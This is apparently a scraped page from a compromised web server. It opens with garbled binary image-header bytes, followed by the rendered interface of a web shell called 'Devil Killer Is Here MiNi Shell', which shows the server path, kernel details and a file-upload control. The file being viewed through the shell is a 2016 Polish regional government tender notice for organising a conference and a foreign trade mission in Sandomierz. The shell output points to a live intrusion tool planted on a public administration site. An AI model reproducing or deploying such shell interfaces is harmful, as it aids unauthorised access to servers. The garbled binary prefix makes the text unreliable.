JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160621/96267-N-2016.html

<p class="kh_header"><b>Kielce: Usługa przygotowania, organizacji i kompleksowej obsługi jednodniowej konferencji, w Sandomierzu, dla maksymalnie 140 osób w dniu 26.08.2016 r. oraz 
usługa kompleksowej organizacji przyjazdowej misji gospodarczej zagranicznych przedsiębiorców/handlowców/importerów z branży spożywczo-przetwórczej w dniach 24 - 27 sierpnia 2016r.</b><br>
<b>Numer ogłoszenia: 96267 - 2016; data zamieszczenia: 21.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Świętokrzyskie - Urząd Marszałkowski Województwa Świętokrzyskiego , al. IX Wieków Kielc 3, 25-516 Kielce, woj. świętokrzyskie, tel. 41 3421901, 3421677, 3421576, faks 41 3445265, 3445723.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sejmik.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa przygotowania, organizacji i kompleksowej obsługi jednodniowej konferencji, w Sandomierzu, dla maksymalnie 140 osób w dniu 26.08.2016 r. oraz 
usługa kompleksowej organizacji przyjazdowej misji gospodarczej zagranicznych przedsiębiorców/handlowców/importerów z branży spożywczo-przetwórczej w dniach 24 - 27 sierpnia 2016r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	I CZĘŚĆ
1)Przedmiotem zamówienia jest usługa przygotowania, organizacji 
i kompleksowej obsługi jednodniowej konferencji, w Sandomierzu, dla maksymalnie 140 osób; w dniu 26.08.2016 r. pn.Potencjał eksportowy i handlowy świętokrzyskich producentów sektora spożywczo-przetwórczego, realizowanej ze środków Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2014-2020.
2)Miejsce i data wydarzenia: Zamek królewski w Sandomierzu w województwie świętokrzyskim w dniu 26.08.2016 roku
Uwaga!
Konferencja obędzie się w Sali Rycerskiej na Zamku Królewskim w Sandomierzu. Sala jest zarezerwowana przez Zamawiającego w godzinach od 9:00 do 16:00 w dniu 26.08.2016 roku. Wykonawca wyłoniony do realizacji zamówienia zobowiązany będzie ponieść koszty wynajmu sal w kwocie 3290 zł brutto (w ww godzinach) według kosztorysu: Sala Rycerska 350zł/h x 7h = 2450zł brutto (w tym nagłośnienie, rzutnik, ekran, pomieszczenie baszty południowej) oraz pomieszczenie po byłej kawiarni 120zł/h x 7h = 840zł brutto 
(w tym zaplecze kuchnia) do rozmów biznesowych. Koszt wynajęcia tych pomieszczeń Wykonawca musi uwzględnić w cenie oferty. Wyposażenie techniczne sali, zgodne ze specyfikacją, jest dodatkowo płatne przez Wykonawcę.
3)W ramach zamówienia do zadań wykonawcy należeć będzie m.in.:
a)zapewnienie sali konferencyjnej wraz z wyposażeniem; 
b)zapewnienie tłumaczenia symultanicznego i konsekutywnego;
c)zapewnienie recepcji konferencji;
d)zapewnienie usługi cateringowej podczas konferencji;
e)zorganizowanie kolacji;
f)obsługa konferencji, wydrukowanie programu konferencji oraz zaproszeń, wykonanie identyfikatorów, smyczy i innych materiałów konferencyjnych;
g)udokumentowanie fotograficzne przebiegu Konferencji oraz przygotowanie informacji podsumowującej konferencję;
h)opracowanie i przeprowadzenie ankiety ewaluacyjnej. 
4)Zamawiający wymaga zapewnienia podczas całej konferencji opiekuna, który podczas całego czasu jej trwania zajmie się koordynacją prawidłowego jej przebiegu oraz będzie czuwał nad sprawnym i terminowym przebiegiem konferencji na miejscu i rozwiązywaniem ewentualnych problemów, które wynikną w trakcie realizacji.
2.II CZĘŚĆ
1)Przedmiotem zamówienia jest usługa kompleksowej organizacji przyjazdowej misji gospodarczej zagranicznych przedsiębiorców  handlowców  importerów z branży spożywczo-przetwórczej w dniach 24- 27 sierpnia 2016r., realizowanej ze środków Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2014-2020.
2)Głównym tematem misji gospodarczej będzie promocja sektora spożywczo-przetwórczego regionu świętokrzyskiego poza Polską oraz nawiązanie nowych trwałych kontaktów handlowych na zagranicznych rynkach. 
3)Misja gospodarcza będzie trwała 4 dni (wraz z przylotem i wylotem zagranicznych uczestników misji) i odbędzie się w dniach 24 - 27 sierpnia 2016r. w Sandomierzu i jego okolicach.
4)Uczestnicy przyjazdowej misji gospodarczej to przedsiębiorcy, handlowcy i importerzy z branży spożywczo-przetwórczej  łącznie 16 osób (2 osoby z Niemiec, 2 osoby z Wielkiej Brytanii, 2 osoby z Bułgarii, 2 osoby z Chorwacji, 2 osoby z Węgier, 2 osoby z Rumunii, 2 osoby z Serbii, 1 osobę z Iranu oraz 1 osobę z Algierii.
5)Zamawiający wymaga, aby wykonawca zapewnił min. 1 (jednego) tłumacza,  konsekutywnego, który posługuje się biegłą znajomością języka polskiego i angielskiego  i który to będzie towarzyszyć uczestnikom misji gospodarczej przez cały czas jej trwania.
6)Liczba osób reprezentujących Zamawiającego (Urząd Marszałkowski Województwa Świętokrzyskiego - COIiP) to 4 osoby.
7)W ramach misji do zadań Wykonawcy należeć będzie m.in.:
a) zabezpieczenie logistyczne misji gospodarczej, w tym:transport, ubezpieczenie uczestników, zakwaterowanie, wyżywienie.
b)obsługa misji gospodarczej zagranicznych przedsiębiorców z zakresie zapewnienia tłumaczenia ustnego konsekutywnego.
c)zapewnienie identyfikatorów z etui oraz smyczy dla wszystkich uczestników przyjazdowej misji gospodarczej.
d)prowadzenie listy obecności.
e)opracowanie i przygotowanie pisemnego raportu podsumowującego misję.
8)Wykonawca zobowiązany będzie do posiadania polisy  umowy ubezpieczenia uczestników misji i do przedłożenia Zamawiającemu oryginału polisy lub jej kopii potwierdzonej za zgodność z oryginałem  nie później niż 24 godziny przed terminem przyjazdu.
3.Szczegółowy zakres i opis przedmiotu zamówienia części I i II zawiera załącznik Nr 1 do SIWZ.
4.Zamawiający zastrzega sobie prawo do współdecydowania i kontroli sposobu realizacji zamówienia  każdej części na każdym jego etapie. 
5.Wykonawca zobowiązuje się do pozostania z zamawiającym w stałym kontakcie i do informowania go na bieżąco o stanie przygotowań do organizowanego wydarzenia.
6.Zamawiający oczekuje od Wykonawcy na całym etapie realizowania zamówienia, należytej staranności, wysokiej jakości świadczonych usług oraz profesjonalnego podejścia do jego wykonywania.
7.Cenę oferty wykonawca oblicza i podaje w Formularzu oferty, którego wzór zawiera dodatek nr 1 do SIWZ. Przy obliczaniu ceny wykonawca musi uwzględnić wszystkie koszty związane z wykonaniem usługi dla odpowiedniej części. Formularz oferty musi być wypełniony zgodnie z wymaganiami zamawiającego i podpisany przez wykonawcę. 
8.Zamawiający dopuszcza powierzenie wykonania zamówienia podwykonawcom. W takim przypadku zamawiający żąda wskazania przez wykonawcę w swojej ofercie (Formularz oferty) zakresy (części) zamówienia, którą zamierza powierzyć podwykonawcom lub podania przez wykonawcę nazw (firm) podwykonawców, na których zasoby wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b ustawy, w celu wykazania spełniania warunków udziału w postępowaniu, opisanych w rozdziale V SIWZ. Niedopełnienie ww obowiązku oznaczać będzie, iż wykonawca wykona przedmiot zamówienia samodzielnie. 
9.Przy realizacji zamówienia z udziałem podwykonawców zastosowanie mają przepisy art. 36b ust. 2 ustawy.    
10.Zlecenie części przedmiotu zamówienia podwykonawcom nie zmienia zobowiązań wykonawcy wobec zamawiającego. Wykonawca będzie odpowiedzialny za działania, uchybienia i zaniedbania podwykonawców i ich pracowników w takim samym stopniu jakby to były działania, uchybienia i zaniedbania jego własnych pracowników. 
11.Szczegółowe zasady określające sposób realizacji zamówienia, rozliczeń, oraz wysokość kar umownych dla odpowiedniej części zawarte zostały w dodatku nr 4A 4B do SIWZ - Wzór umowy.
12.Rozliczenia między zamawiającym i wykonawcą prowadzone będą w złotych polskich.
13.Zamawiający dopuszcza składania ofert częściowych na wybraną/e przez wykonawcę część/części zamówienia. 
14.Zamawiający nie dopuszcza składania ofert wariantowych.
15.Zamawiający nie przewiduje udzielania zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy.
16.Zamawiający nie przewiduje:zawarcia umowy ramowej,aukcji elektronicznej,zwrotu kosztów udziału w postępowaniu..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.95.00.00-8, 55.10.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy posiadają odpowiednią wiedzę i doświadczenie niezbędne do wykonania zamówienia, i w powyższym zakresie wykażą, iż w
ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia
działalności jest krótszy - w tym okresie, wykonali należycie: I część
co najmniej jedną (1) usługę polegającą na zorganizowaniu wydarzenia promocyjnego takiego jak: 
a)konferencja, na kwotę co najmniej 25 000,00 zł brutto, w której uczestniczyło co najmniej 80 osób
lub 
b)forum, na kwotę co najmniej 25 000,00 zł brutto, w którym uczestniczyło co najmniej 80 osób
lub
c)seminarium, na kwotę co najmniej 25 000,00 zł brutto, w którym uczestniczyło co najmniej 80 osób.
II część
co najmniej jedną (1 ) usługę, która polegała na organizacji wydarzenia takiego jak przyjazdowa/wyjazdowa misja gospodarcza lub przyjazdowa/wyjazdowa wizyta studyjna zagranicznych przedsiębiorców dla minimum 10 przedsiębiorców

UWAGA:
a.Wykazanie się większą liczbą usług, spełniających w/w warunek określony w pkt 1A)1) dla odpowiedniej części będzie przez zamawiającego punktowane - zgodnie z opisem zawartym w rozdziale XIII, pkt 1.II. SIWZ -OPIS KRYTERIÓW, KTÓRYMI ZAMAWIAJĄCY BĘDZIE SIĘ KIEROWAŁ PRZY WYBORZE OFERTY WRAZ Z PODANIEM ZNACZENIA TYCH KRYTERIÓW I SPOSOBU OCENY OFERT.
b.Zamawiający informuje, iż w przypadku gdy min. 1 wykazana usługa potwierdza spełnianie warunku udziału w postępowaniu, w stosunku do pozostałych usług wykazanych w celu uzyskania większej liczby punktowej, nie będzie miał zastosowania art. 26 ust. 3 ustawy dotyczący uzupełniania dokumentów.
c.W przypadku wykazania wartości danej usługi w walucie obcej, zamawiający dokona przeliczenia tej wartości na wartość w złotych według średniego kursu Narodowego Banku Polskiego (NBP) dla danej waluty 
z dnia publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu ukazania się ogłoszenia o zamówieniu, NBP nie opublikuje informacji o średnim kursie walut, zamawiający dokona odpowiednich przeliczeń wg średniego kursu z pierwszego, kolejnego dnia, w którym NBP opublikuje ww. informacje-dotyczy tylko I części. 
Zamawiający oceni spełnianie w/w warunku udziału w postępowaniu wg zasady spełnia/ nie spełnia, na podstawie oświadczenia z art. 22 ust. 1 ustawy Prawo zamówień publicznych i
dokumentów załączonych do oferty, które zostały wyszczególnione w pkt. III.4.1 ogłoszenia
oraz w rozdziale VI lit. A SIWZ
UWAGA:
1) Zgodnie z §1 ust. 4 rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. 
w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane, w wykazie głównych usług wykonawca jest zobowiązany wskazać jedynie usługi potwierdzające spełnianie warunków określonych 
w rozdziale V pkt. 1.A)1) SIWZ i załączenia dowodów należytego wykonania w stosunku do tych usług.
2) Zgodnie z §1 ust. 2 w/w rozporządzenia dowodami, o których mowa w pkt. 1), są poświadczenia, albo oświadczenia wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczeń.
3) Zgodnie z §1 ust. 3 w/w rozporządzenia, w przypadku gdy zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.
4) Jeżeli wykonawca polega na wiedzy i doświadczeniu innych podmiotów (art. 26 ust. 2b) zobowiązany jest udowodnić, że będzie dysponował zasobami w trakcie realizacji zamówienia.  W szczególności za dowód uznaje się pisemne zobowiązanie takich podmiotów (oryginał lub poświadczona notarialnie kopia) do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
5) Zgodnie z §7 ust. 2 w/w rozporządzenia w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność 
z oryginałem odpowiednio przez wykonawcę lub te podmioty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują odpowiednim
potencjałem technicznym. Zamawiający oceni spełnianie w/w warunku udziału w postępowaniu wg zasady spełnia/ nie spełnia, na podstawie oświadczenia z art. 22 ust. 1
ustawy Prawo zamówień publicznych-oryginał</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują osobami zdolnymi
do wykonania zamówienia. Zamawiający oceni spełnianie w/w warunku udziału w
postępowaniu wg zasady spełnia/ nie spełnia, na podstawie oświadczenia z art. 22 ust. 1
ustawy Prawo zamówień publicznych-oryginał</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy znajdują się w sytuacji
ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Zamawiający oceni
spełnianie w/w warunku udziału w postępowaniu wg zasady spełnia/ nie spełnia, na podstawie
oświadczenia z art. 22 ust. 1 ustawy Prawo zamówień publicznych-oryginał</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany przez wykonawcę Formularz oferty - wg wzoru określonego w dodatku nr 1 do SIWZ. 
2.W przypadku wspólnego ubiegania się o udzielenie zamówienia wykonawców występujących wspólnie (dotyczy również spółki cywilnej) - pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (oryginał lub  poświadczona notarialnie kopia). 
3.Pełnomocnictwo określające jego zakres - w przypadku gdy wykonawcę reprezentuje pełnomocnik (oryginał lub poświadczona notarialnie kopia). 
4. W sytuacji, gdy wykonawca polega na zasobach innych podmiotów na zasadach określonych art. 26 ust. 2b ustawy, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami innych podmiotów w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. W celu umożliwienia oceny, czy wykonawca będzie dysponował tymi zasobami w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, dokument, z którego wynikać będzie zobowiązanie podmiotu trzeciego, powinien jednoznacznie wyrażać wolę udzielenia wykonawcy odpowiednich zasobów oraz wskazywać:
a.zakres dostępnych wykonawcy zasobów innego podmiotu, 
b.sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, 
c.charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
d.zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.sejmik.kielce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski
Województwa Świętokrzyskiego w Kielcach al. IX Wieków Kielc 3, 25-516 Kielce, Budynek C-2, pokój
212.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2016 godzina 12:00, miejsce: Urząd Marszałkowski Województwa Świętokrzyskiego w Kielcach,
al. IX Wieków Kielc 3, 25-516 Kielce, Budynek C-2, pokój 216 (Kancelaria Ogólna)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie finansowane jest z Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego, na lata 2014-2020 w ramach projektu: Świętokrzyskie - hard to pronunce, easy to do business in, który jest współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego, Działanie 2.4 Promocja gospodarcza kluczowych branż gospodarki regionu.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> usługa przygotowania, organizacji 
i kompleksowej obsługi jednodniowej konferencji, w Sandomierzu, dla maksymalnie 140 osób; w dniu 26.08.2016 r. pn.:Potencjał eksportowy i handlowy świętokrzyskich producentów sektora spożywczo-przetwórczego, realizowanej ze środków Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2014-2020..</p>
